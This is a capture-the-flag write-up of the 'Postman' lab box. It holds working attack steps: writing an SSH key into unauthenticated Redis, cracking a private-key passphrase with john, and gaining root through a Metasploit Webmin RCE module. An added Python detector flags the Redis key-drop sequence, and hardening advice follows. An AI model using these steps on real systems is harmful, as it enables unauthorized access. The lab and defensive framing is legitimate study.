Port scan
nmap -sC -sV -oA path postman.htb
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Login to Webmin
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Webmin version 19.1 was found, but after several attempts it appears the password-reset feature is not enabled.
After looking around online, a Redis port that nmap had not picked up was found:
PORT STATE SERVICE VERSION
6379/tcp open tcpwrapped
Redis unauthenticated access
Generate an SSH key pair and write the public key into Redis
Generate the SSH key
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
Write it into Redis
cat /root/.ssh/key.txt | redis-cli -h 10.10.10.160 -x set xxx
Connect to Redis and import the public key
Connect to Redis
redis-cli -h 10.10.10.160
Import the public key
config set dir /var/lib/redis/.ssh/
config set dbfilename "authorized_keys"
save
SSH in as the redis user
ssh -i /root/.ssh/id_rsa redis@10.10.10.160
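Added here as a defender-side example (not part of the original writeup): a small Python detector that reads `redis-cli MONITOR` output and flags the exact sequence used above, CONFIG SET dir to a sensitive path, CONFIG SET dbfilename, then SAVE, correlated per client IP. The MONITOR sample, client addresses and key material are constructed.

```python
import re
from collections import defaultdict

# Constructed sample of `redis-cli MONITOR` output reproducing the key-drop sequence
# from this writeup; the client addresses and the key material are made up.
SAMPLE_MONITOR = """\
1566800000.100000 [0 10.10.14.5:51234] "set" "xxx" "\\n\\nssh-rsa AAAAB3...example\\n\\n"
1566800001.200000 [0 10.10.14.5:51236] "config" "set" "dir" "/var/lib/redis/.ssh/"
1566800002.300000 [0 10.10.14.5:51236] "config" "set" "dbfilename" "authorized_keys"
1566800003.400000 [0 10.10.14.5:51236] "save"
1566800010.500000 [0 10.10.14.9:40000] "get" "session:42"
"""

# MONITOR line: "<timestamp> [<db> <ip:port>] "arg" "arg" ..."
LINE_RE = re.compile(r'^(\d+\.\d+) \[\d+ (\S+)\] (.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')      # one double-quoted, backslash-escaped argument
SENSITIVE_DIRS = ("/.ssh", "/etc/cron", "/var/spool/cron", "/var/www", "/root/")
SENSITIVE_NAMES = ("authorized_keys", ".php", ".sh")


def parse_line(line):
    """Return (timestamp, client_ip, [args]) for one MONITOR line, or None for non-matching lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ip = m.group(2).rsplit(":", 1)[0]
    return float(m.group(1)), ip, ARG_RE.findall(m.group(3))


def detect_rdb_drop(monitor_text):
    """Alert on clients that redirect the RDB dump to a sensitive path/name and then SAVE."""
    state = defaultdict(dict)                    # client_ip -> {"dir": ..., "dbfilename": ...}
    alerts = []
    for line in monitor_text.splitlines():
        parsed = parse_line(line)
        if not parsed:
            continue
        ts, ip, args = parsed
        cmd = [a.lower() for a in args[:3]]
        if cmd[:2] == ["config", "set"] and len(args) >= 4:
            state[ip][cmd[2]] = args[3]           # remember dir / dbfilename per client
        elif cmd[:1] in (["save"], ["bgsave"]):
            d = state[ip].get("dir", "")
            f = state[ip].get("dbfilename", "")
            if any(s in d for s in SENSITIVE_DIRS) or any(s in f for s in SENSITIVE_NAMES):
                alerts.append({"ts": ts, "client": ip, "dir": d, "dbfilename": f})
    return alerts


if __name__ == "__main__":
    for a in detect_rdb_drop(SAMPLE_MONITOR):
        print("ALERT: RDB dump redirected to", a["dir"] + a["dbfilename"], "by", a["client"])
```

The configuration fix for this finding lives in redis.conf: bind Redis to localhost, keep protected-mode yes, set requirepass, and use rename-command to disable or rename CONFIG.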
Locate user.txt
redis@Postman:/opt$ locate user.txt
/home/Matt/user.txt
redis@Postman:/opt$ ls -la /home/Matt/user.txt
-rw-rw---- 1 Matt Matt 33 Aug 26 03:07 /home/Matt/user.txt
Obtain Matt's private key
We need Matt's password; the nmap results show SSH is open on the target, so look for Matt's SSH private key.
redis@Postman:/opt$ locate id_rsa*
/opt/id_rsa.bak
redis@Postman:/opt$ ls -la /opt/id_rsa.bak
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 /opt/id_rsa.bak
Password cracking
Use john on the attacking machine to crack the key passphrase
python3 /usr/share/john/ssh2john.py Matt_pass.txt > pass
john --wordlist=/usr/share/wordlists/rockyou.txt pass
Matt's password obtained: computer2008
Switch user and get the flag
redis@Postman:/opt$ su Matt
Password:
Matt@Postman:~$ wc -c user.txt
33 user.txt
Get root
Webmin is version 19.1; use the corresponding msf module to get root.
msf5 > search webmin
msf5 exploit(linux/http/webmin_backdoor) > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > setg username Matt
username => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > setg password computer2008
password => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.10.10.160
rhosts => 10.10.10.160
Note that ssl must be set to true, otherwise the connection cannot be established.
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true
ssl => true
Get the flag
wc -c /root/root.txt
33 /root/root.txt